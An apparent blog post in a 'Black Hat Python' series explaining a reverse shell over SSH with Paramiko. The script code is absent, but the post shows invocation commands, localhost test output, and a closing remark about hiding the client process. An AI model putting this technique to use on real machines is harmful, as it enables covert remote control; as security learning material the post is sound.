Black Hat Python — Reverse Shells using SSH and Paramiko
Aug 23, 2017 · 2 min read

A couple of posts ago, I demonstrated a script that used python sockets to establish a tcp session with a server and execute commands remotely using the subprocess module. You can check it out here. In this post, we will do something similar, but using SSH and executing commands on the client from the server. This has a couple of advantages:
- Using a SSH tunnel, traffic is now encrypted. Thats a very nice benefit!
- You are executing commands on a client rather than a listening server so this can be handy in a restrictive network environment. For example, the terminal you would like to execute commands on only has outbound ssh access. In this case, we establish a ‘reverse shell’ on the server and send commands to the client.

SSH client script:
SSH server script:
Testing it out..
SSH Server:
python3 ch2_ssh_server.py 127.0.0.1 22022 username password[*] Bind Success for SSH Server using 127.0.0.1:22022
[*] Listening
[*] Incoming TCP Connection from 127.0.0.1:63333
[*] SSH Parameters Negotiation Succeeded
[*] Authenticating
[*] SSH Client Authenticated
<Shell:#> df -hFilesystem Size Used Avail Capacity iused ifree %iused Mounted on/dev/disk1 465Gi 432Gi 32Gi 94% 113391753 8451957 93% /devfs 395Ki 395Ki 0Bi 100% 1367 0 100% /devmap -hosts 0Bi 0Bi 0Bi 100% 0 0 100% /netmap auto_home 0Bi 0Bi 0Bi 100% 0 0 100% /homelocalhost:/onaFBFVIRH7yK-OrLpwGnl 465Gi 465Gi 0Bi 100% 0 0 100% /Volumes/MobileBackups/dev/disk5 953Gi 8.4Gi 945Gi 1% 2193574 247692264 1% /Volumes/Backups<Shell:#> dateWed Aug 23 16:14:42 GST 2017<Shell:#>
SSH Client:
python3 ch2_ssh_client.py 127.0.0.1 22022 username password
Thinking maliciously, I suppose if the ssh client session/ process can be hidden in some way, this approach is much more elegant than using sockets. Hope this post is helpful. I certainly enjoyed learning the topic!